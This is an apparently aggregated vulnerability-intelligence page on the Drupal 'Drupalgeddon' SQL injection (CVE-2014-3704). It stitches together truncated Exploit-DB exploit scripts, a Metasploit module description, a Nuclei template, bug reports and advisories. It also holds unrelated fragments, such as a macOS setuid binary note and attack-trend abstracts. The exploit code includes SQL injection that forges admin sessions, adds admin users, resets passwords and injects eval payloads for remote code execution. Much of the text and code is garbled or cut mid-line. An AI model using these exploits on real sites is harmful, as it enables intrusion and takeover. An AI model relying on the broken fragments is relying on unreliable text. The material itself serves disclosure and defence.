The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources,
one of which is suid root:
-rwsr-sr-x 1 root wheel 113K Oct 1 2014 runner
Taking a look at it we can see that it's vending an objective-c Distributed Object :)
[ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]
The main function immediately temporarily drops privs doing
seteuid(getuid()); setegid(getgid());
then reads line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to lookup that
name in the DO namespace and create a
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
exploitdb·2014-11-03
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
Drupal 7.0
//·
include 'common.inc';
include 'password.inc';
// set values
$user_name = 'admin';
$url = isset($argv[1])?$argv[1]:'';
$user_id = isset($argv[2])?intval($argv[2]):1;
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$user_id]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$url = rtrim($url,'/');
list( , $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$inject = "UNION SELECT $user_id,'$user_name
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
exploitdb·2014-11-03
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
Drupal 7.0
// and Stefan Esser
//·
include 'common.inc';
include 'password.inc';
// set values
$user_id = 0;
$user_name = '';
$code_inject = 'phpinfo();session_destroy();die("");';
$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$code|$file]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (!empty($code)) {
if (is_file($code)) {
$code_inject = str_replace('','',file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION= array('a'=>'eval(b
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)
exploitdb·2014-10-17·CVSS 7.5
CVE-2014-3704 [HIGH] Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)
Drupal 7.0 array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
exploitdb·2014-10-17
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
Drupal 7.0 > 6) & 0x3f]
if i >= count:
break
i += 1
if i > 12) & 0x3f]
if i >= count:
break
i += 1
output += itoa64[(value >> 18) & 0x3f]
if i >= count:
break
return output
def rehash(self, stored_hash, password):
# Drupal 6 compatibility
if len(stored_hash) == 32 and stored_hash.find('$') == -1:
return hashlib.md5(password).hexdigest()
# Drupal 7
if stored_hash[0:2] == 'U$':
stored_hash = stored_hash[1:]
password = hashlib.md5(password).hexdigest()
hash_type = stored_hash[0:3]
if hash_type == '$S$':
hash_str = self.password_crypt('sha512', password, stored_hash)
elif hash_type == '$H$' or hash_type == '$P$':
hash_str = self.password_crypt('md5', password, stored_hash)
else:
hash_str = False
return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-dr
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
exploitdb·2014-10-16
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
---
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Creditz to https://www.reddit.com/user/fyukyuk
# EDB Note ~ Updated version: https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection_sa-core-2014-005.py
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;u
Metasploit
Drupal HTTP Parameter Key/Value SQL Injection
metasploit
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). Two methods are available to trigger the PHP payload on the target:
- set TARGET 0: Form-cache PHP injection method (default). This uses the SQLi to upload a malicious form to Drupal's cache, then trigger the cache entry to execute the payload using a POP chain.
- set TARGET 1: User-post injection method. This creates a new Drupal user, adds it to the administrators group, enable Drupal's PHP module, grant the administrators the right to bundle PHP code in their post, create a new post containing the payload and preview it
Nuclei
Drupal SQL Injection
nuclei·CVSS 7.5
CVE-2014-3704 [HIGH] Drupal SQL Injection
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
Template:
id: CVE-2014-3704
info:
  name: Drupal SQL Injection
  author: princechaddha
  severity: high
  description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and it
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present ATTACK2VEC, a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test ATTACK2VEC on a dataset of billions of security events collected from the c
Greynoiseio
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
blogs_greynoiseio·2025-05-27
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to earl
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
HackerOne
Drupal 7 pre auth sql injection and remote code execution
hackerone·2015-04-06·CVSS 7.5
[HIGH] Drupal 7 pre auth sql injection and remote code execution
# Motivation
I found a SQL Injection bug in Drupal $value) {
[...]
$new_keys[$key . '_' . $i] = $value;
}
The function assumes that it is called with an array which has no keys. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));
Which results in this SQL Statement
SELECT * from users where name IN (:name_0, :name_1)
with the parameters name_0 = user1 and name_1 = user2.
The problem occurs if the array has keys that are not integers. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test) -- ' => 'user1','test' => 'user2')));
This results in an exploitable SQL query:
SELECT * FROM users WHERE name IN (:name_test) -- , :name_test )
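The expansion described in the report above, as an added PHP example that is not part of the original report and is not Drupal's source: a simplified model of array-placeholder expansion, run once with caller-supplied keys and once with the array re-indexed by array_values(). The function names and the `$reindex` switch are hypothetical; the input array is the one quoted in the report.

```php
<?php
// Added example: simplified model of array-placeholder expansion.
// Not Drupal's source; function names and the $reindex switch are hypothetical.

function expand_arguments($query, array $args, $reindex) {
  foreach ($args as $key => $data) {
    if (!is_array($data)) {
      continue;
    }
    // Hardened path: array_values() discards caller-supplied keys, so the
    // suffix appended to the placeholder name is always an integer index.
    $items = $reindex ? array_values($data) : $data;
    $new_keys = array();
    foreach ($items as $i => $value) {
      $new_keys[$key . '_' . $i] = $value;
    }
    // The placeholder names themselves are written into the SQL text.
    $query = str_replace($key, implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

// Defence in depth: a placeholder name must be ':' plus word characters only.
function unsafe_placeholders(array $args) {
  $bad = array();
  foreach (array_keys($args) as $name) {
    if (!preg_match('/\A:\w+\z/', $name)) {
      $bad[] = $name;
    }
  }
  return $bad;
}

// Input taken from the report: one array key carries SQL syntax.
$sql = 'SELECT * FROM {users} WHERE name IN (:name)';
$input = array(':name' => array('test) -- ' => 'user1', 'test' => 'user2'));

foreach (array('vulnerable' => false, 'hardened' => true) as $label => $reindex) {
  list($query, $args) = expand_arguments($sql, $input, $reindex);
  echo $label, ":\n  ", $query, "\n";
  echo '  placeholders: ', implode(' | ', array_keys($args)), "\n";
  echo '  rejected by name check: ', count(unsafe_placeholders($args)), "\n";
}
```

With keys preserved, the key text lands in the SQL string before the statement is prepared; with re-indexing, only `:name_0` and `:name_1` appear and the name check rejects nothing.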
Bugzilla
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [epel-all]
bugzilla·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this
Bugzilla
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [fedora-all]
bugzilla·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this iss
Bugzilla
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005)
bugzilla·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005)
Stefan Horst discovered a pre-authenticated SQL injection flaw in Drupal. This could lead to code execution and privilege escalation.
Upstream patch:
https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch
This issue has been fixed in Drupal 7.32. Version 7.32 is an updates candidate in Fedora and EPEL.
References:
https://www.drupal.org/SA-CORE-2014-005
http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1153403]
Affects: epel-all [bug 1153404]
---
drupal7-7.32-1.fc19 has been pushed to the Fedora 19 stable repository. If problems sti
http://osvdb.org/show/osvdb/113371
http://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.html
http://packetstormsecurity.com/files/128721/Drupal-7.31-SQL-Injection.html
http://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.html
http://seclists.org/fulldisclosure/2014/Oct/75
http://secunia.com/advisories/59972
http://www.debian.org/security/2014/dsa-3051
http://www.exploit-db.com/exploits/34984
http://www.exploit-db.com/exploits/34992
http://www.exploit-db.com/exploits/34993
http://www.exploit-db.com/exploits/35150
http://www.openwall.com/lists/oss-security/2014/10/15/23
http://www.securityfocus.com/archive/1/533706/100/0/threaded
http://www.securityfocus.com/bid/70595
https://www.drupal.org/SA-CORE-2014-005
https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
https://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html
2014-10-16
Published
Exploited in the wild